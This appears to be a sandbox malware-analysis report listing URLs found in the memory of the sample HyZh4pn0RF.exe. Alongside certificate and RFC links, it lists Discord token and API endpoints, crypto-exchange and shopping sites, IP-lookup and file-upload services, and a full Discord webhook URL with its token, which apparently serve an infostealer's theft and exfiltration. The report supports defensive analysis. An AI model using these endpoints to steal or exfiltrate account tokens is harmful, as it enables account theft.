            Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B3AB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790797363.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786346031.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812368209.000002539A2E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B44F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1818290124.0000025398310000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812957078.000002539A97F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787246377.000002539A977000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807987225.000002539A97A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794431278.000002539A2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809460438.000002539A2E4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794163535.000002539A2D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790797363.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786346031.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B44F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/p
            Source: HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812368209.000002539A2E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794431278.000002539A2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809460438.000002539A2E4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794163535.000002539A2D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/yyValueErro
            Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A6CA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822164617.000002539A6D6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807329061.000002539A6CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
            Source: HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826914311.000002539BC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
            Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824647034.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
            Source: HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784057520.000002539B388000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785564604.000002539B46D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784529385.000002539B38D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785675797.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784136988.000002539B3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784339813.000002539B459000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B3B1000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825933015.000002539B3B4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1816843287.000002539B462000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1826197005.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784569592.000002539B3C8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785761530.000002539B402000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784136988.000002539B3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783944926.000002539B3F6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784775873.000002539B401000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825933015.000002539B3C9000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812494121.000002539B2AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794610908.000002539B2A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808214858.000002539B2A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/4g
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/C7
            Source: HyZh4pn0RF.exe, 00000002.00000003.1812494121.000002539B2AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794610908.000002539B2A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808214858.000002539B2A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/Gd
            Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
            Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1477126962.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1474540160.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: HyZh4pn0RF.exe, 00000002.00000003.1795287489.000002539A7E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808293549.000002539A3BF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821256115.000002539A3C1000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788862603.000002539A3A4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806014708.000002539A7E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794327700.000002539A3BF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B475000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787795082.000002539A7E8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790103376.000002539A3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806133338.000002539A7EA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791704398.000002539A3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498852357.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811177117.000002539A8C7000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790850713.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500555282.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787579799.000002539A8B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: HyZh4pn0RF.exe, 00000002.00000002.1822292872.000002539A719000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A717000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B43B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784091613.000002539B42C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1817908654.000002539A718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
            Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824647034.000002539B1B6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: HyZh4pn0RF.exe, 00000002.00000002.1822292872.000002539A719000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A717000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B43B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784091613.000002539B42C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1817908654.000002539A718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps8
            Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825548276.000002539B33D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
            Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 0000000A.00000003.1979590875.000001F3E341D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
            Source: HyZh4pn0RF.exe, 00000002.00000002.1824793076.000002539B273000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1824738204.000002539B202000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)z&
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org)
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://binance.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://binance.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/users/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/r
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/users/
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdR
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/r
            Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gift/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gift/2d
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://disney.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disney.com)z$
